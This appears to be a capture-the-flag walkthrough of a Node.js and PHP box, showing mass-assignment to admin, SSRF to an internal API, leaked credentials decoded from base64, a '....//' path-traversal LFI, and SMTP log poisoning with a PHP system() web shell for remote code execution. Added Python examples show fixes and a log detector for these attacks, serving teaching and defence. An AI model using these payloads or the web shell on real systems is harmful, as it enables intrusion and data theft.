Enumeration
Port Scans
nmap - TCP All ports scan
Port | State | Service | Version
--- | --- | --- | ---
22/tcp | open | ssh | OpenSSH 8.2p1 Ubuntu 4ubuntu0.11
25/tcp | open | smtp | Postfix smtpd
110/tcp | open | pop3 | Dovecot pop3d
143/tcp | open | imap | Dovecot imapd
993/tcp | open | imap | Dovecot imapd
995/tcp | open | pop3 | Dovecot pop3d
4000/tcp | open | http | Node.js
50000/tcp | open | http | Apache httpd 2.4.41
HTTP
Navigating to the website on port 4000 shows a login portal with the suggested credentials of guest / guest.
Logging in with guest / guest, we see some kind of social website.
First Flag
Clicking on View Profile, we see that we are able to Recommend an Activity to guest, the user we are currently logged in as.
If we set the isAdmin property to true and click on the Recommend Activity button, we can see that the isAdmin property in the user profile has been updated. We can also see some additional menus in the top right-hand corner.
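The isAdmin change works because the server writes whatever fields the client sends straight into the stored profile, a mass-assignment weakness. The following is an added example (not the challenge application's code) contrasting that behaviour with an allowlisted update; the record layout, the field names other than isAdmin, and the request body are constructed for the illustration.

```python
import copy
import json

# Constructed user record standing in for the stored profile of the guest account.
USER_DB = {"guest": {"username": "guest", "bio": "", "isAdmin": False}}

# Fields a user may legitimately change about their own profile (assumed).
UPDATABLE_FIELDS = {"bio", "recommendedActivity"}

# Constructed request body modelled on the tampered "Recommend Activity" request.
TAMPERED_BODY = '{"recommendedActivity": "hiking", "isAdmin": true}'


def fresh_db():
    """Deep copy so each call starts from an untouched record."""
    return copy.deepcopy(USER_DB)


def update_profile_vulnerable(db, username, body):
    """Mass assignment: every key in the client JSON is written to the record,
    so a client-supplied isAdmin flag silently becomes server state."""
    user = db[username]
    user.update(json.loads(body))
    return user


def update_profile_safe(db, username, body):
    """Allowlist: copy only the fields a user is permitted to change.
    Privilege flags are never taken from the request."""
    user = db[username]
    data = json.loads(body)
    for key in UPDATABLE_FIELDS:
        if key in data:
            user[key] = data[key]
    return user


def rejected_keys(body):
    """Keys in the request that the allowlist drops; worth logging as tampering."""
    return sorted(set(json.loads(body)) - UPDATABLE_FIELDS)


if __name__ == "__main__":
    print(update_profile_vulnerable(fresh_db(), "guest", TAMPERED_BODY))
    print(update_profile_safe(fresh_db(), "guest", TAMPERED_BODY))
    print(rejected_keys(TAMPERED_BODY))
```

Logging the output of rejected_keys on every update is a cheap detection signal: a normal client never sends isAdmin, so its appearance in a profile update is an attempt to escalate.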
Clicking on the API link brings us to the following page.
Highlight and copy the second link shown below.
Click on the Settings link.
Paste the link into the Update Banner Image URL field and click on the Update Banner Image button.
http://127.0.0.1:5000/getAllAdmins101099991
Once the URL has been retrieved, some base64 text is shown. Copy all of the base64 text.
We can then use the command below to decode it; the decoded JSON contains the credentials used in the next step.
echo 'eyJSZXZpZXdBcHBVc2VybmFtZSI6ImFkbWluIiwiUmV2aWV3QXBwUGFzc3dvcmQiOiJhZG1pbkAhISEiLCJTeXNNb25BcHBVc2VybmFtZSI6ImFkbWluaXN0cmF0b3IiLCJTeXNNb25BcHBQYXNzd29yZCI6IlMkOSRxazZkIyoqTFFVIn0=' | base64 -d
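The banner-image feature fetched http://127.0.0.1:5000/getAllAdmins101099991 on the server's behalf, which is server-side request forgery: the application never checked where the supplied URL pointed. As an added example (not the challenge application's code), here is the check such a feature should run before fetching. The name table is constructed so the example runs offline; a real implementation would resolve with socket.getaddrinfo() and validate every returned address.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed name table so the example runs offline.
FAKE_DNS = {
    "cdn.example.com": ["1.2.3.4"],        # constructed public address
    "localtest.example": ["127.0.0.1"],    # a name that resolves to loopback
}


def resolve(host, dns=FAKE_DNS):
    """IP literals pass straight through; names are looked up in the table."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        return dns.get(host, [])


def is_internal(ip):
    """True for any address a server-side fetch must never be pointed at."""
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def is_safe_banner_url(url, dns=FAKE_DNS):
    """Accept only http(s) URLs whose host resolves solely to non-internal addresses."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    addrs = resolve(parts.hostname, dns)
    if not addrs:
        return False  # unresolvable, or an encoding we refuse to guess at
    return not any(is_internal(ipaddress.ip_address(a)) for a in addrs)


if __name__ == "__main__":
    for u in ("http://127.0.0.1:5000/getAllAdmins101099991",
              "https://cdn.example.com/banner.png",
              "file:///etc/passwd"):
        print(u, is_safe_banner_url(u))
```

Two caveats for a production version: the fetch must connect to the address that was validated (otherwise a second DNS lookup can be rebound to an internal host), and redirects returned by the remote server need the same check applied to their target.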
If we then navigate to http://10.10.146.32:50000/login.php we can log in with the credentials administrator / S$9$qk6d#**LQU and capture the first flag.
Second Flag
Review the BurpSuite history (if you haven't been proxying through BurpSuite the whole time, you probably should have been).
Select the Proxy tab, then HTTP history, then click on Filter just below HTTP history.
Ensure the highlighted settings are all selected, then click on Apply.
You should see in the history the GET request to profile.php?img=profile.png.
Right-click on this request and click Send to Intruder.
Click on the Clear button on the right-hand side, in the middle.
Highlight profile.png in the request, then click on the Add button.
The text profile.png should now be changed to §profile.png§, indicating that it has been selected as a payload position.
Click on Payloads, then select the Fuzzing - path traversal payload list.
Once the payloads in the red box below are showing, click on the Start Attack button.
Click on the Length column header to sort the requests by descending length. Click on the highlighted request, then on the Response tab. You should see the hosts file displayed, indicating that we have found a Local File Inclusion (LFI) vulnerability.
Right-click on this request and select Send to Repeater.
Now we need to turn this LFI into Remote Code Execution (RCE). The usual way to do this is log poisoning, most commonly via a web server log file (Apache or NGINX). However, these don't seem to be available, so we will try the SSH log file.
In BurpSuite Repeater, modify the request as below, then click Send.
GET /profile.php?img=%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2fvar%2flog%2fmail.log
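The traversal payload in that request is built from repeated `....//` segments rather than plain `../`. That shape defeats a filter that deletes `../` in a single pass: removing the middle `../` from `....//` leaves a fresh `../` behind. The following added example (not the challenge's profile.php, whose source is not shown) reproduces that naive filter beside a resolver that normalises the path first and refuses anything outside the image directory. WEB_ROOT is an assumed location.

```python
import os
from urllib.parse import unquote

# Assumed location of the profile images; the real path on the box is not known.
WEB_ROOT = "/var/www/html/images"

# The payload used in the walkthrough: twelve '....//' segments, URL-encoded.
PAYLOAD = "%2e%2e%2e%2e%2f%2f" * 12 + "var%2flog%2fmail.log"


def strip_dotdot_once(path):
    """Naive filter: deletes each '../' in a single pass. Because the pass is not
    repeated, '....//' loses its middle '../' and collapses to a new '../'."""
    return path.replace("../", "")


def resolve_vulnerable(img):
    """Decode, 'sanitise' with the naive filter, then join under the web root."""
    cleaned = strip_dotdot_once(unquote(img))
    return os.path.normpath(os.path.join(WEB_ROOT, cleaned))


def resolve_safe(img):
    """Normalise first, then refuse any result that is not strictly inside WEB_ROOT."""
    candidate = os.path.normpath(os.path.join(WEB_ROOT, unquote(img)))
    if candidate == WEB_ROOT or os.path.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        return None
    return candidate


if __name__ == "__main__":
    print("naive filter, plain ../ :", resolve_vulnerable("../../../../etc/hosts"))
    print("naive filter, ....//   :", resolve_vulnerable(PAYLOAD))
    print("hardened, plain ../    :", resolve_safe("../../../../etc/hosts"))
    print("hardened, ....//       :", resolve_safe(PAYLOAD))
```

normpath works on the string only; where the image directory may contain symlinks, apply the same containment check to os.path.realpath() of the candidate. In PHP the equivalent fix is to accept only a basename() from an allowlist of known images rather than a path.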
The response indicates that the log file may in fact be blank, so we can use SMTP to put a reverse shell into the log file.
Connect to the SMTP service using telnet and run the commands below to attempt to send an email. It will fail; that is OK and to be expected.
telnet 10.10.66.126 25
HELO hulkgosmash
MAIL FROM: hulkgosmash@mail.com
RCPT TO: <?php system($_GET['cmd']); ?>
Back in BurpSuite Repeater, modify the request as below and click Send. You should see www-data at the bottom of the log file, indicating that we have RCE.
GET /profile.php?img=%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2fvar%2flog%2fmail.log&cmd=whoami
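The poisoning above only works because the web server user can read /var/log/mail.log and the rejected RCPT TO value is written to it verbatim. From the defender's side, the same log records the attempt. The following added example (not part of the walkthrough) scans mail log lines for PHP markers and attributes them to the connecting client; the three Postfix lines are constructed to resemble what the telnet session above would leave behind.

```python
import re

# Constructed Postfix lines modelled on the rejected RCPT TO attempt above.
SAMPLE_MAIL_LOG = """\
Jan  5 10:12:01 web postfix/smtpd[1337]: connect from unknown[10.10.14.5]
Jan  5 10:12:20 web postfix/smtpd[1337]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 504 5.5.2 <?php system($_GET['cmd']); ?>: Recipient address rejected: need fully-qualified address; from=<hulkgosmash@mail.com> to=<?php system($_GET['cmd']); ?> proto=SMTP helo=<hulkgosmash>
Jan  5 10:12:25 web postfix/smtpd[1337]: disconnect from unknown[10.10.14.5]
"""

# PHP open tags, or common execution functions followed by a parenthesis.
PHP_MARKERS = re.compile(
    r"<\?(?:php|=)|\b(?:system|exec|passthru|shell_exec|eval)\s*\(", re.I)
# Address smtpd records for the connection: "from unknown[10.10.14.5]".
CLIENT_IP = re.compile(r"from \S+?\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def find_poisoned_lines(log_text):
    """Return (line number, line) for every log line carrying PHP markers."""
    return [(n, line) for n, line in enumerate(log_text.splitlines(), 1)
            if PHP_MARKERS.search(line)]


def client_ip(line):
    """Source address recorded by smtpd for the connection, if present."""
    m = CLIENT_IP.search(line)
    return m.group(1) if m else None


def summarise(log_text):
    """Map each offending client address to the line numbers it poisoned."""
    report = {}
    for n, line in find_poisoned_lines(log_text):
        report.setdefault(client_ip(line) or "unknown", []).append(n)
    return report


if __name__ == "__main__":
    for n, line in find_poisoned_lines(SAMPLE_MAIL_LOG):
        print(f"line {n} from {client_ip(line)}: {line[:80]}...")
    print(summarise(SAMPLE_MAIL_LOG))
```

A hit here is only half the chain; pair it with the web access log entry for profile.php?img= pointing at the same log file. The structural fix is the one Postfix's default permissions already provide (log files readable by root and adm only, not by www-data), together with removing the path traversal in profile.php.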
Modify the command as below to view the files in the web directory.
GET /profile.php?img=%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2fvar%2flog%2fmail.log&cmd=ls
Modify the command again to view the contents of the file, which holds the flag.
GET /profile.php?img=%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2fvar%2flog%2fmail.log&cmd=cat+505eb0fb8a9f32853b4d955e1f9123ea.txt